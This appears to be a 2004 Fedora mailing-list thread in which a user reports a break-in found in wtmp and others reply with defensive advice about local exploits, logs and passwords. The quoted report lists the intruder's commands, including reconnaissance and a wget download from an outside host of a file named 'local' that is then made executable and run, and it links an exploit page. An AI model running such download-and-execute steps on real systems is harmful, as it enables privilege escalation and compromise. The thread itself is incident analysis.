<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN">
<HTML>
<HEAD>
  <META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=UTF-8">
  <META NAME="GENERATOR" CONTENT="GtkHTML/3.3.2">
</HEAD>
<BODY>
I really should add as well that the exploit mentioned is a local exploit.  You need to be on the machine first as a local user before you can execute it.  Maybe check the non-root user histories as well.  Maybe some one has pinched your password.<BR>
<BR>
<BR>
On Mon, 2004-11-22 at 15:51 +1100, Aaron Scott wrote:<BR>
<BLOCKQUOTE TYPE=CITE>
    <FONT COLOR="#000000">And how does this prove that there is a vulnerability in fedora and not that you have poor securty?</FONT><BR>
    <BR>
    <FONT COLOR="#000000">According to the URL's you post some one has installed a root kit.  Unlucky.  But they had to get it there first.</FONT><BR>
    <BR>
    <FONT COLOR="#000000">You should first discover how they got onto your machine.  You will need to check a lot more logs than just wtemp.  Try secure and messages as well.  Maybe some one guessed your password.  I really hope that you have firewalled that ip range out to help prevent further trouble from that IP range ( assuming though the hacker isn't bouncing from comprimised machine to comprimised machine ).  Also, you might want to consider who has had or might have had physical access to your machine ( if that is possible ).</FONT><BR>
    <BR>
    <FONT COLOR="#000000">Pointing the finger at Fedora with out real proof is pointless.</FONT><BR>
    <BR>
    <BR>
    <FONT COLOR="#000000">On Mon, 2004-11-22 at 02:14 +0000, richard mullens wrote: </FONT>
    <BLOCKQUOTE TYPE=CITE>
<PRE>
<FONT COLOR="#000000">Someone logged into my system on 13 Nov 2004</FONT>
<FONT COLOR="#000000">I found the following in /var/log/wtmp</FONT>

<FONT COLOR="#000000">207-36-180-20.prt.primarydns.com</FONT>
<FONT COLOR="#000000">demo.allegientsystems.com</FONT>

<FONT COLOR="#000000">My user password was changed - but not the root password - and the </FONT>
<FONT COLOR="#000000">following commands had been executed:-</FONT>

<FONT COLOR="#000000">w</FONT>
<FONT COLOR="#000000">uname -a</FONT>
<FONT COLOR="#000000">cat /etc/issue</FONT>
<FONT COLOR="#000000">cd /tmp</FONT>
<FONT COLOR="#000000">wget chebeleu.com/local</FONT>
<FONT COLOR="#000000">chmod +x local</FONT>
<FONT COLOR="#000000">./local -d -r</FONT>
<FONT COLOR="#000000">./local -d -r</FONT>
<FONT COLOR="#000000">lunx</FONT>
<FONT COLOR="#000000">lynx</FONT>

<FONT COLOR="#000000">There is a similar report dated 10-Nov-2004 at </FONT>
<FONT COLOR="#000000"><A HREF="http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631">http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631</A></FONT>
<FONT COLOR="#000000">where someone suggested it might be the exploit at </FONT>
<FONT COLOR="#000000"><A HREF="http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php">http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php</A></FONT>

<FONT COLOR="#000000">Anybody know any more ?</FONT>

</PRE>
    </BLOCKQUOTE>
<PRE>
<FONT COLOR="#000000">-- </FONT>
<FONT COLOR="#000000">fedora-test-list mailing list</FONT>
<FONT COLOR="#000000"><A HREF="mailto:fedora-test-list@redhat.com">fedora-test-list@redhat.com</A></FONT>
<FONT COLOR="#000000">To unsubscribe: </FONT>
<FONT COLOR="#000000"><A HREF="http://www.redhat.com/mailman/listinfo/fedora-test-list">http://www.redhat.com/mailman/listinfo/fedora-test-list</A></FONT>
</PRE>
</BLOCKQUOTE>
</BODY>
</HTML>